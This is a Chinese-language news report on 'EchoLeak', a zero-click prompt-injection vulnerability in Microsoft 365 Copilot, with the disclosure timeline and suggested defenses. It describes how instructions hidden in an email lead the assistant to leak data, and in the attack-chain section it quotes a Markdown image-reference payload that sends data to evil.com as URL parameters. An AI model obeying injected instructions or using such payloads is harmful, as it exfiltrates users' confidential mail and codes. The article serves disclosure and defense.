微软 Copilot AI 高危漏洞曝光：可泄露验证码、邮件等敏感数据

零点击、无需交互：仅凭一封邮件即可入侵Copilot

研究人员发现，微软365 Copilot存在一个名为“EchoLeak”的高危漏洞，这也是已知首个针对AI代理的“零点击”攻击案例。攻击者无需借助钓鱼手法或恶意软件，只需向目标用户发送一封看似无害的电子邮件，当Copilot后台自动扫描该邮件时，隐藏在内的恶意指令就会被执行。整个攻击过程不依赖用户点击任何链接或打开附件，彻底绕过了传统的安全防御逻辑。

EchoLeak攻击链：从隐藏Markdown到数据外传

攻击链的核心在于利用Copilot对内部数据（如邮件、Teams聊天、OneDrive文件）和不可信外部输入的处理机制。攻击者在邮件中嵌入一段精心构造的Markdown语法，例如![Image alt text][ref] [ref]: https://www.evil.com?param=。当Copilot在后台准备检索增强生成（RAG）上下文时，会触发该Markdown引用，从而将敏感数据（如验证码、邮件内容、用户信息）作为URL参数发送到攻击者控制的服务器。由于微软的内容安全策略（CSP）默认信任Teams和SharePoint域名，攻击者还可借此通道绕过其他域名限制，实现数据隐蔽外传。

微软五个月修补缺口，根本缺陷触目惊心

研究人员于1月向微软安全响应中心报告该漏洞，微软历时5个月才最终完成修复。期间微软曾在4月尝试修补，但发现仍存在关联安全问题，直到5月才彻底解决。微软发言人表示已对产品进行更新，客户无需额外操作。但研究人员指出，EchoLeak暴露的不是简单漏洞，而是AI代理设计上的根本缺陷——指令和数据未做明确分离，导致模型对恶意输入“全盘接受”，这与上世纪90年代的系统漏洞危机如出一辙。

AI代理的“结构性心脏病”：指令与数据不分

Aim Security联合创始人Adir Gruss强调，EchoLeak的影响远超出Copilot本身，可能波及Anthropic的MCP协议、Salesforce的Agentforce等所有类似AI代理系统。由于AI代理在“思考过程”中同时使用可信指令和不可信数据，攻击者通过隐藏提示注入就能轻易诱导模型泄露权限范围内的敏感信息。研究人员称，这如同一个人对所有读到的内容都照单全收，极易被操控。目前大多数《财富》500强企业对部署AI代理深感恐惧，根源就在于这类结构性缺陷。

防御之道：即时隔离、输入过滤与用户警惕

针对EchoLeak式攻击，企业需要构建分层防御体系。首先，AI系统必须实现严格的即时隔离，清晰区分用户输入和系统指令。其次，对所有输入进行过滤，清除隐藏的HTML、零宽度字符、Base64编码等混淆内容，并禁用自动预览Markdown链接和图片的功能。同时限制Copilot可访问的上下文数据范围，避免会话令牌、机密文档等敏感资产成为默认上下文。最后，应对AI输出进行日志监控，并培养员工识别“过于聪明”或异常具体的内容，形成人机协同的安全防线。